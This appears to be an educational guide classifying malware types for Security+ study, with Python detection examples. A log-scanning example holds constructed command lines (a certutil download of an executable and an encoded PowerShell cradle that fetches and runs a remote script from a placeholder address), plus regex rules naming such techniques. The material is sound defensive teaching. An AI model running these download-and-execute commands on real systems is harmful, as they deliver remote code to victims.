
Malware types and classifications: A comprehensive guide

(Updated: August 15, 2025)
Diagram of the Cyber Kill Chain framework

Complete Malware Types & Classifications

Basic Malware Categories

Malware (Umbrella Term)

General term for any malicious software designed to harm, exploit, or gain unauthorized access to systems.

  • Includes: All the types listed below
  • Purpose: Catch-all category for malicious code

Virus

Self-replicating code that attaches to and infects other files or programs.

  • Key trait: Needs a host file to survive and spread
  • Spread method: When infected file is executed or shared
  • Analogy: Like a biological virus that needs a host cell
  • Examples: File infector viruses, macro viruses

Worm

Self-replicating malware that spreads independently across networks without needing a host file.

  • Key trait: Can spread automatically without user action
  • Spread method: Exploits network vulnerabilities, email, USB drives
  • Analogy: Like a parasite that can move between hosts on its own
  • Examples: Conficker, WannaCry, Stuxnet

Trojan (Trojan Horse)

Malware disguised as legitimate software that tricks users into installing it.

  • Key trait: Appears harmless but contains malicious payload
  • Spread method: Social engineering, fake software downloads
  • Analogy: Like the wooden horse from Greek mythology
  • Examples: Remote Access Trojans (RATs), banking trojans

Rootkit

Stealth malware designed to hide its presence and maintain privileged access.

  • Key trait: Operates at system level to avoid detection
  • Purpose: Maintain persistent, hidden access
  • Detection: Very difficult, requires specialized tools
  • Examples: Kernel-level rootkits, bootkit rootkits

Spyware

Surveillance malware that secretly monitors and collects user information.

  • Purpose: Steal passwords, browsing habits, personal data
  • Stealth: Often runs invisibly in background
  • Examples: Keyloggers, screen capture tools, browser-tracking components (adware that reports browsing data back to its operator crosses into spyware)

Ransomware

Extortion malware that encrypts data and demands payment for decryption.

  • Method: Encrypt files, display ransom demand
  • Payment: Usually cryptocurrency for anonymity
  • Examples: CryptoLocker, WannaCry, Ryuk

Adware

Advertising malware that displays unwanted advertisements.

  • Purpose: Generate revenue through forced ad displays
  • Annoyance: Pop-ups, browser redirects, slow performance
  • Legality: Sometimes borderline legitimate

Bloatware

Unwanted pre-installed software that comes with new devices or software packages.

  • Characteristics: Takes up space, slows system, hard to remove
  • Examples: Trial software, manufacturer utilities, bundled apps
  • Risk: May contain vulnerabilities or privacy issues
  • Legality: Usually legitimate but unwanted

Keylogger

Monitoring software that records every keystroke made on a system.

  • Purpose: Steal passwords, sensitive information, personal data
  • Types: Hardware keyloggers (physical devices) or software-based
  • Stealth: Often runs silently in background; hardware keyloggers leave no software trace at all
  • Use cases: Both malicious (credential theft) and legitimate (parental controls)

Backdoor

Hidden access method that bypasses normal authentication to access a system.

  • Purpose: Maintain unauthorized access for future use
  • Installation: Often installed by other malware or during initial compromise
  • Stealth: Designed to remain undetected by users and security tools
  • Examples: Hidden or extra privileged user accounts, listening services on unusual ports, modified system binaries or authentication modules
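One concrete check for the "hidden user account" style of backdoor, added here as an illustrative example (this is not code from the original page). It parses `/etc/passwd`-format data and flags a second UID-0 account, a service account that has been given a login shell, and any non-root account whose home is `/root`. The passwd content below is constructed for the demo; the set of accounts expected to have no login shell is an assumption you would replace with your own baseline.

```python
"""Added example: look for backdoor-style account entries in /etc/passwd data.

Illustrative check, not code from the original page. SAMPLE_PASSWD is
CONSTRUCTED for the demo; point the function at the real file contents.
"""

# Constructed sample of /etc/passwd lines. The last two are the kind of
# entries an attacker leaves behind: a second UID-0 account and a service
# account that has quietly been given an interactive shell.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
toor:x:0:0:backup admin:/root:/bin/bash
postgres:x:110:118:PostgreSQL:/var/lib/postgresql:/bin/bash
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}
# Assumed baseline: service accounts that should never have a login shell.
EXPECTED_NOLOGIN = {"daemon", "www-data", "sshd", "postgres"}


def parse_passwd(text):
    """Return a list of dicts, one per well-formed passwd line."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line; a real audit would report it too
        name, _, uid, gid, _gecos, home, shell = fields
        entries.append({"name": name, "uid": int(uid), "gid": int(gid),
                        "home": home, "shell": shell})
    return entries


def find_suspicious_accounts(text, expected_nologin=EXPECTED_NOLOGIN):
    """Flag accounts that look like hidden or backdoor access.

    Rules:
      1. Any UID-0 account other than 'root' (a second superuser).
      2. A known service account that now has a login shell.
      3. A non-root account whose home directory is /root.
    Returns a sorted list of (account, reason) tuples.
    """
    findings = []
    for e in parse_passwd(text):
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "extra UID 0 account"))
        if e["name"] in expected_nologin and e["shell"] not in NOLOGIN_SHELLS:
            findings.append((e["name"], f"service account with login shell {e['shell']}"))
        if e["home"] == "/root" and e["name"] != "root":
            findings.append((e["name"], "home directory is /root"))
    return sorted(findings)


if __name__ == "__main__":
    for account, reason in find_suspicious_accounts(SAMPLE_PASSWD):
        print(f"{account}: {reason}")
```

On the sample data this reports `toor` twice (extra UID 0, home is `/root`) and `postgres` once (login shell). The same idea applies on Windows by diffing local user and Administrators-group membership against a known-good list.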

Remote Access Trojan (RAT)

Trojan horse that provides complete remote control of an infected system.

  • Capabilities: File access, screen capture, camera/microphone access, command execution
  • Control: Attacker can control victim's computer as if sitting at it
  • Examples: DarkComet, njRAT, Poison Ivy
  • Evasion: Often disguised as, or built from, legitimate remote administration tools

Logic Bomb

Malicious code that remains dormant until triggered by specific conditions.

  • Triggers: Specific date/time, system events, user actions, file deletions
  • Purpose: Sabotage, revenge, or creating chaos at predetermined time
  • Examples: Activate on employee's termination date, trigger after 30 days
  • Detection: Very difficult to find until activated

Scareware

Fake security software that tricks users into believing their system is infected.

  • Method: Display fake virus warnings, system alerts, security scans
  • Goal: Trick users into purchasing fake antivirus or providing personal information
  • Examples: "Your computer is infected! Buy our antivirus now!"
  • Social engineering: Exploits fear and urgency

Cryptojacking

Unauthorized cryptocurrency mining using victim's computer resources.

  • Method: Installs mining software secretly or runs in web browser
  • Impact: Slow performance, high CPU usage, increased electricity bills
  • Profit: Attacker earns cryptocurrency from victim's computing power
  • Detection: Monitor for sustained, unexplained CPU/GPU usage, especially combined with connections to mining-pool services or binaries running from temporary directories
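The detection bullet above is easy to get wrong if it is reduced to "alert on high CPU", because video encoders and build jobs spike too. The following triage heuristic is an added example (not code from the original page): it takes periodic per-process snapshots and only flags a process when at least two independent signals agree, such as CPU that stays high across every sample, a connection to a Stratum-style mining port, or a binary living in a temp or hidden directory. The process records and the port list are constructed and assumed for the demo; on a real host you would populate them from `ps`, `lsof` or your EDR.

```python
"""Added example: a cryptojacking triage heuristic over process samples.

Not code from the original page. SAMPLES is CONSTRUCTED to look like three
periodic snapshots of per-process CPU plus each process's remote TCP
endpoints. One hot sample is normal; a process that is hot in every sample
AND talks to a mining-pool-style port, or runs from a throwaway path, is not.
"""
from collections import defaultdict

# Assumption: ports commonly used by Stratum mining pools. Treat as a hint,
# not proof; legitimate software can use any of them.
STRATUM_PORTS = {3333, 3334, 4444, 5555, 7777, 8888, 14444, 45700}
TEMP_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")

# Constructed samples: (sample_index, pid, exe_path, cpu_percent, [(remote_ip, port), ...])
SAMPLES = [
    (0, 101, "/usr/bin/ffmpeg", 97.0, []),                      # legit transcode, spikes then idles
    (1, 101, "/usr/bin/ffmpeg", 12.0, []),
    (2, 101, "/usr/bin/ffmpeg", 3.0, []),
    (0, 202, "/usr/lib/firefox/firefox", 40.0, [("93.184.216.34", 443)]),
    (1, 202, "/usr/lib/firefox/firefox", 35.0, [("93.184.216.34", 443)]),
    (2, 202, "/usr/lib/firefox/firefox", 38.0, [("93.184.216.34", 443)]),
    (0, 303, "/tmp/.x/kworkerds", 99.0, [("203.0.113.7", 14444)]),  # miner named like a kernel thread
    (1, 303, "/tmp/.x/kworkerds", 98.5, [("203.0.113.7", 14444)]),
    (2, 303, "/tmp/.x/kworkerds", 99.2, [("203.0.113.7", 14444)]),
]


def score_processes(samples, cpu_threshold=85.0, min_samples=3):
    """Return {pid: {"exe", "score", "reasons"}} for processes with >= 2 signals."""
    by_pid = defaultdict(list)
    for _, pid, exe, cpu, endpoints in samples:
        by_pid[pid].append((exe, cpu, endpoints))

    findings = {}
    for pid, rows in by_pid.items():
        if len(rows) < min_samples:
            continue  # not enough history to call it "sustained"
        exe = rows[-1][0]
        reasons = []
        if all(cpu >= cpu_threshold for _, cpu, _ in rows):
            reasons.append("sustained high CPU")
        ports = {port for _, _, eps in rows for _, port in eps}
        if ports & STRATUM_PORTS:
            reasons.append(f"connection to mining-pool port {sorted(ports & STRATUM_PORTS)}")
        if exe.startswith(TEMP_DIRS) or "/." in exe:
            reasons.append("binary in temp or hidden directory")
        # Two independent signals required to keep false positives down.
        if len(reasons) >= 2:
            findings[pid] = {"exe": exe, "score": len(reasons), "reasons": reasons}
    return findings


if __name__ == "__main__":
    for pid, info in score_processes(SAMPLES).items():
        print(pid, info["exe"], info["reasons"])
```

Only PID 303 is reported: `ffmpeg` is hot in one sample but idles afterwards, and `firefox` is steadily busy but has no second signal. Lowering `cpu_threshold` does not change that, which is the point of requiring corroboration.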

Network-Based Malware & Botnets

Zombie (Bot)

Infected computer under remote control by cybercriminals.

  • Control: Operates without user knowledge, follows commands
  • Capabilities: Send spam, launch attacks, mine cryptocurrency, steal data
  • Network: Usually part of larger botnet
  • Infection: Through malware, viruses, trojans, or exploits

Botnet

Network of infected computers (zombies) controlled centrally by cybercriminals.

  • Scale: Can include thousands to millions of infected devices
  • Uses: DDoS attacks, spam distribution, cryptocurrency mining, credential theft
  • Examples: Conficker, Zeus, Mirai (IoT botnet)
  • Control: Managed through Command and Control (C&C) servers

LOC (Low-Observable Characteristics)

Stealth techniques used by advanced malware to avoid detection by security systems.

  • Purpose: Remain hidden from antivirus, EDR, and security monitoring
  • Techniques:
    • Living off the land: Using legitimate system tools (PowerShell, WMI, certutil) so activity blends in with normal administration
    • Process hollowing: Starting a legitimate process in a suspended state, replacing its in-memory image with malicious code, then resuming it
    • Fileless operation: Operating entirely in memory, with no payload written to disk
    • Covert communications: Hiding C&C traffic inside legitimate-looking protocols such as HTTPS or DNS
    • Timing-based evasion: Operating only during specific hours or conditions (for example, after the user has been idle)
  • Examples: APT tooling, advanced rootkits, state-sponsored malware
  • Detection: Requires behavioral analysis (command-line and process-tree logging) and threat hunting rather than file signatures

File Infector Virus

Traditional virus that infects executable files (.exe, .com files).

  • Method: Attaches to program files
  • Activation: When infected program runs
  • Spread: Through file sharing, infected software

Boot Sector Virus

System-level virus that infects the master boot record (MBR) or boot sectors.

  • Location: Disk boot areas that load before operating system
  • Impact: Can prevent system from starting
  • Persistence: Very hard to remove, loads before antivirus

Macro Virus

Document-based virus that uses macros in office documents.

  • Target: Word, Excel, PowerPoint files
  • Method: Malicious VBA (Visual Basic) code in documents
  • Spread: Email attachments, shared documents
  • Examples: Melissa (1999), a Word macro virus that mailed itself to the first 50 Outlook contacts
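A practical first check for the macro virus category is simply "does this Office file carry a VBA project at all?" The example below is added here and is not code from the original page. Modern Office Open XML files (`.docm`, `.xlsm`, `.pptm`, and a `.docx` into which a macro container has been smuggled) are ZIP archives; a VBA project is stored as a part named `vbaProject.bin` and declared in `[Content_Types].xml` with the `application/vnd.ms-office.vbaProject` content type. The function checks both signals so that removing only one does not hide the macro. The sample package is constructed in memory for the demo and is not a complete, valid Word document.

```python
"""Added example: detect a VBA project inside an Office Open XML package.

Illustrative check, not from the original page. build_sample_docx() creates
a CONSTRUCTED minimal package; inspect_ooxml() is the actual check.
"""
import io
import zipfile

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"


def build_sample_docx(with_macro: bool) -> bytes:
    """Construct a minimal OOXML-style package (demo only, not a valid Word file)."""
    overrides = ""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # First 8 bytes are the OLE2 magic that a real vbaProject.bin starts with.
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8)
            overrides = f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>'
        z.writestr(
            "[Content_Types].xml",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="xml" ContentType="application/xml"/>'
            f"{overrides}</Types>",
        )
    return buf.getvalue()


def inspect_ooxml(data: bytes) -> dict:
    """Report macro indicators in an OOXML package.

    Two independent signals are checked:
      - any part whose name ends with vbaProject.bin (in any folder)
      - the VBA content type declared in [Content_Types].xml
    'has_macro' is True if either fires. Non-ZIP input (e.g. a legacy OLE2
    .doc/.xls) is reported as an error; use oletools/olevba for those.
    """
    result = {"vba_parts": [], "declared_vba_type": False, "has_macro": False, "error": None}
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            names = z.namelist()
            result["vba_parts"] = [n for n in names if n.lower().endswith("vbaproject.bin")]
            if "[Content_Types].xml" in names:
                content_types = z.read("[Content_Types].xml").decode("utf-8", "replace")
                result["declared_vba_type"] = VBA_CONTENT_TYPE in content_types
    except zipfile.BadZipFile:
        result["error"] = "not a ZIP/OOXML container (legacy OLE2 files need a different parser)"
        return result
    result["has_macro"] = bool(result["vba_parts"]) or result["declared_vba_type"]
    return result


if __name__ == "__main__":
    for flag in (True, False):
        print("macro" if flag else "clean", inspect_ooxml(build_sample_docx(flag)))
```

This is a presence check, not a verdict: signed, approved macros exist in many businesses. It is the step that decides whether a document goes on to deeper analysis (VBA extraction, sandboxing) or straight to the user.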

Script Virus

Interpreted code viruses using scripting languages.

  • Languages: JavaScript, VBScript, PowerShell, Python, batch files
  • Method: Malicious scripts that execute when opened
  • Common: Email attachments with .js, .vbs, .ps1 extensions
  • Examples: ILOVEYOU (2000), a VBScript attachment that overwrote files and mailed itself to every Outlook contact

Fileless Malware

Memory-resident malware that operates without creating files on disk.

  • Method: Lives entirely in RAM, registry, or legitimate processes
  • Detection: Very difficult for traditional antivirus
  • Persistence: Uses legitimate system tools (PowerShell, WMI)
  • Examples: Living-off-the-land attacks, e.g., a PowerShell payload stored in a registry value and launched by a WMI event subscription
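Both the LOC section and the fileless section above come down to the same detection problem: there is no file to scan, so you hunt in process-creation telemetry for legitimate tools being used in illegitimate ways. The following scanner is an added example (not code from the original page) that runs a small rule set over Windows 4688-style log lines, and, for encoded PowerShell, decodes the base64/UTF-16LE command so the content rules can see what actually ran. The log lines, the IP addresses and the rule names are constructed for the demo.

```python
"""Added example: flag living-off-the-land command lines in process-creation logs.

Not code from the original page. SAMPLE_LOG is CONSTRUCTED to resemble the
CommandLine field of Windows Security event 4688 / Sysmon event 1. Each rule
is a regex over the command line; encoded PowerShell is decoded and re-scanned.
"""
import base64
import re

RULES = [
    ("powershell_encoded", re.compile(
        r"powershell(\.exe)?.*\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("powershell_download_cradle", re.compile(
        r"powershell.*(Net\.WebClient|DownloadString|Invoke-WebRequest|iwr\s)", re.I)),
    ("certutil_download", re.compile(r"certutil(\.exe)?\s.*-urlcache.*-split.*https?://", re.I)),
    ("wmic_process_create", re.compile(r"wmic(\.exe)?\s.*process\s+call\s+create", re.I)),
    ("mshta_remote", re.compile(r"mshta(\.exe)?\s+https?://", re.I)),
    ("regsvr32_squiblydoo", re.compile(r"regsvr32(\.exe)?\s.*/i:https?://.*scrobj\.dll", re.I)),
]

# PowerShell -EncodedCommand takes base64 of the UTF-16LE script text.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')".encode("utf-16le")
).decode()

SAMPLE_LOG = [  # constructed
    'EventID=4688 NewProcessName=C:\\Windows\\System32\\cmd.exe CommandLine="cmd.exe /c dir C:\\Users"',
    'EventID=4688 NewProcessName=C:\\Windows\\System32\\certutil.exe '
    'CommandLine="certutil.exe -urlcache -split -f http://203.0.113.5/p.exe C:\\Users\\Public\\p.exe"',
    'EventID=4688 NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell.exe -nop -w hidden -enc ' + ENCODED + '"',
    'EventID=4688 NewProcessName=C:\\Windows\\System32\\wbem\\WMIC.exe '
    'CommandLine="wmic /node:fileserver process call create cmd.exe"',
    'EventID=4688 NewProcessName=C:\\Program Files\\Git\\bin\\git.exe CommandLine="git pull"',
]


def extract_command_line(line):
    """Pull the quoted CommandLine value out of a log line (whole line if absent)."""
    m = re.search(r'CommandLine="(.*)"\s*$', line)
    return m.group(1) if m else line


def decode_encoded_powershell(cmdline):
    """Return the decoded script for -enc/-EncodedCommand invocations, else None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_log(lines):
    """Return one hit dict per suspicious line: command, matched rules, decoded script."""
    hits = []
    for line in lines:
        cmd = extract_command_line(line)
        matched = [name for name, rx in RULES if rx.search(cmd)]
        decoded = decode_encoded_powershell(cmd)
        if decoded:
            # Content rules get a second pass over the decoded script.
            matched += [name for name, rx in RULES
                        if name not in matched and rx.search("powershell " + decoded)]
        if matched:
            hits.append({"command": cmd, "rules": matched, "decoded": decoded})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["rules"], "<-", hit["command"][:70])
        if hit["decoded"]:
            print("   decoded:", hit["decoded"])
```

Three of the five lines are flagged; `cmd.exe /c dir` and `git pull` pass. Note that the encoded PowerShell line only reveals its download cradle after decoding, which is why logging the full command line (and, better, Script Block Logging) matters more than any on-disk scan for this class of malware.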

Memory-Resident Malware

RAM-based malware that stays active in system memory.

  • Persistence: Remains active even after initial infection
  • Advantage: Faster execution, harder to detect
  • Weakness: Lost when the system reboots unless it also installs a persistence mechanism, which is why memory capture before shutdown matters during incident response

Advanced Persistent Threats

APT (Advanced Persistent Threat)

Sophisticated, long-term cyberattack typically by nation-states or organized groups.

  • Characteristics:
    • Advanced: Uses zero-day exploits, custom malware
    • Persistent: Maintains long-term access (months/years)
    • Threat: Highly skilled, well-funded attackers
  • Goals: Espionage, intellectual property theft, strategic advantage
  • Examples: APT1 (China), Cozy Bear (Russia), Lazarus Group (North Korea)
  • Tactics: Social engineering, supply chain attacks, living-off-the-land

AVT (Advanced Volatile Threat)

Less common term for an attack that runs only in volatile memory (RAM) and writes nothing to disk, so a reboot or power loss erases most of the evidence.

  • Key trait: No file artifacts; detection depends on memory forensics and behavioral monitoring rather than file scanning
  • Relation to other terms: Overlaps with the fileless and memory-resident categories above; "volatile" is the deliberate contrast to the "persistent" in APT
  • Persistence: None on its own; attackers re-infect or pair it with a separate persistence mechanism

Quick Comparison Table

| Type | Self-Replicate | Needs Host | Network Spread | Stealth Level | Primary Goal |
|------|----------------|------------|----------------|---------------|--------------|
| Virus | Yes | Yes | Only via shared files | Medium | Infect files |
| Worm | Yes | No | Yes | Medium | Network spread |
| Trojan | No | No | No | Medium | Deception/Access |
| Rootkit | No | No | No | Very High | Hidden access |
| Ransomware | Sometimes (worm hybrids) | No | Sometimes | Medium | Extortion |
| Spyware | No | No | No | High | Data theft |
| Keylogger | No | No | No | High | Keystroke capture |
| RAT | No | No | Sometimes | Medium | Remote control |
| Backdoor | No | No | No | Very High | Hidden access |
| Logic Bomb | No | Yes | No | Very High | Time-delayed damage |
| Botnet | Via bots | No | Yes | Medium | Distributed control |
| Cryptojacking | Sometimes | No | Sometimes | High | Mining cryptocurrency |
| Fileless | Varies | No | Varies | Very High | Evasion |


Modern Malware Trends

Hybrid Malware

  • Combines multiple techniques (e.g., worm + ransomware, as in WannaCry)
  • More effective and harder to classify, since one sample fits several rows of the table above

Polymorphic Malware

  • Encrypts or re-encodes its body with a different key on each infection, so the bytes differ every time
  • Each infection looks different to signature-based antivirus, but the small decryption routine stays the same and is what scanners key on

Metamorphic Malware

  • Rewrites its own code with each infection (instruction substitution, reordering, inserted filler), so there is no constant decryptor to signature
  • Harder to detect than polymorphism with static signatures; detection relies on emulation and behavioral analysis
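To make the polymorphic/metamorphic distinction concrete, here is an added example (not code from the original page, and not real malware): a harmless string stands in for the malicious body and a list of symbolic opcodes stands in for the decryptor stub. The polymorphic generator re-encrypts the body with a fresh key per copy but keeps the stub constant; the metamorphic generator also rewrites the stub by inserting filler ops between the real ones. Three detectors are then run over many copies: a signature on the body, a signature on the stub, and a simple emulator that executes the decryptor. The opcode names, key length and sample layout are assumptions made up for the demo.

```python
"""Added example: why polymorphic and metamorphic copies defeat byte signatures.

Illustrative, not from the original page and not real malware. PAYLOAD is a
harmless string; STUB_OPS are symbolic opcodes, not machine code.
Sample layout (assumed): <stub ops joined by ';'> '|' <4-byte key> <XOR body>
"""
import random

PAYLOAD = b"echo 'benign demo payload'"
STUB_OPS = [b"LOAD_KEY", b"LOAD_LEN", b"XOR_LOOP", b"JMP_BODY"]   # decryptor logic
FILLER_OPS = [b"NOP", b"MOV_AX_AX", b"XCHG_BX_BX"]                 # semantic no-ops
KEY_LEN = 4

PAYLOAD_SIG = PAYLOAD[:12]            # what a naive AV signature targets
STUB_SIG = b";".join(STUB_OPS[:3])    # what a smarter AV signature targets


def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def _random_key(rng) -> bytes:
    return bytes(rng.randrange(1, 256) for _ in range(KEY_LEN))   # never a zero byte


def polymorphic_sample(rng) -> bytes:
    """Fresh key per copy; the decryptor stub is byte-for-byte identical every time."""
    key = _random_key(rng)
    return b";".join(STUB_OPS) + b"|" + key + xor_bytes(PAYLOAD, key)


def metamorphic_sample(rng) -> bytes:
    """Same decryptor logic, but at least one filler op between each real op."""
    ops = []
    for op in STUB_OPS:
        ops.append(op)
        ops.extend(rng.choice(FILLER_OPS) for _ in range(rng.randrange(1, 3)))
    key = _random_key(rng)
    return b";".join(ops) + b"|" + key + xor_bytes(PAYLOAD, key)


def emulate(sample: bytes) -> bytes:
    """Behavioral analysis: run the decryptor (filler ops are ignored) and return the body."""
    sep = sample.index(b"|")
    key = sample[sep + 1: sep + 1 + KEY_LEN]
    return xor_bytes(sample[sep + 1 + KEY_LEN:], key)


def compare_detection(n: int = 50, seed: int = 1) -> dict:
    """Count hits of three detectors over n copies of each kind of sample."""
    rng = random.Random(seed)
    report = {}
    for kind, gen in (("polymorphic", polymorphic_sample), ("metamorphic", metamorphic_sample)):
        samples = [gen(rng) for _ in range(n)]
        report[kind] = {
            "distinct_copies": len(set(samples)),
            "payload_sig_hits": sum(PAYLOAD_SIG in s for s in samples),
            "stub_sig_hits": sum(STUB_SIG in s for s in samples),
            "emulation_hits": sum(emulate(s) == PAYLOAD for s in samples),
        }
    return report


if __name__ == "__main__":
    for kind, stats in compare_detection().items():
        print(kind, stats)
```

The payload signature never fires for either kind. The stub signature catches every polymorphic copy and no metamorphic copy, while emulation recovers the identical payload from all of them. That is the whole argument for behavioral and emulation-based detection: what the code does is invariant even when every byte changes.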

AI-Powered Malware

  • Uses machine-learning techniques for target selection, lure generation, or evasion
  • Adapts behavior based on environment, for example staying dormant when it detects a sandbox or analysis tooling

Key Distinctions for Security+

Virus vs Worm

  • Virus: Needs host file, spreads when host is shared
  • Worm: Self-sufficient, spreads automatically across networks

Trojan vs Virus

  • Trojan: Doesn't replicate, tricks user into installation
  • Virus: Replicates and spreads to other files/systems

Malware vs Virus

  • Malware: Umbrella term for all malicious software
  • Virus: Specific type of malware that replicates via host files

APT vs Regular Malware

  • APT: Sophisticated, persistent, targeted, state-sponsored
  • Regular Malware: Often automated, widespread, financially motivated

Fileless vs File-based

  • Fileless: Operates in memory/registry, harder to detect
  • File-based: Creates files on disk, easier for antivirus to find
